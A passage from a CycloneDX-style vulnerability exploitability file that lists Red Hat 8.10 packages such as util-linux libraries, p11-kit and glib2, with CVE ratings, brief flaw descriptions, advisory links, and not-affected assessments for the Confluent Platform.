          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-13757",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was found in p11-kit. The RPC message attribute parsing functions p11_rpc_message_get_attribute() and p11_rpc_message_get_attribute_array_value() form a mutually-recursive call chain with no recursion depth limit when processing nested CKA_WRAP_TEMPLATE, CKA_UNWRAP_TEMPLATE, and CKA_DERIVE_TEMPLATE attributes. An unauthenticated attacker with local access to the p11-kit RPC Unix domain socket can send a specially crafted request with deeply nested template attributes, causing stack exhaustion and crashing the p11-kit server process and its dependent services.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-13757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37469"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:38342"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49667"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49668"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53371"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54387"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54760"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-13757"
        },
        {
          "url": "https://bugzilla.redhat.com/2494556"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494556"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-13757"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-49668.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:49667"
        },
        {
          "url": "https://github.com/advisories/GHSA-p2wm-69qx-x25w"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-13757.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-49668.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13757"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13757"
        }
      ],
      "published": "2026-06-29T19:16:40+00:00",
      "updated": "2026-08-13T21:17:40+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.23.22-2.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.23.22-2.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/p11-kit-trust@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/p11-kit@0.23.22-2.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1484",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A flaw was found in the GLib Base64 encoding routine when processing very large input data. Due to incorrect use of integer types during length calculation, the library may miscalculate buffer boundaries. This can cause memory writes outside the allocated buffer. Applications that process untrusted or extremely large Base64 input using GLib may crash or behave unpredictably.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1484"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1484"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1484"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433259"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-quby27cpefwz.toml"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3870"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1484"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1484"
        }
      ],
      "published": "2026-01-27T14:15:56+00:00",
      "updated": "2026-06-17T10:15:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
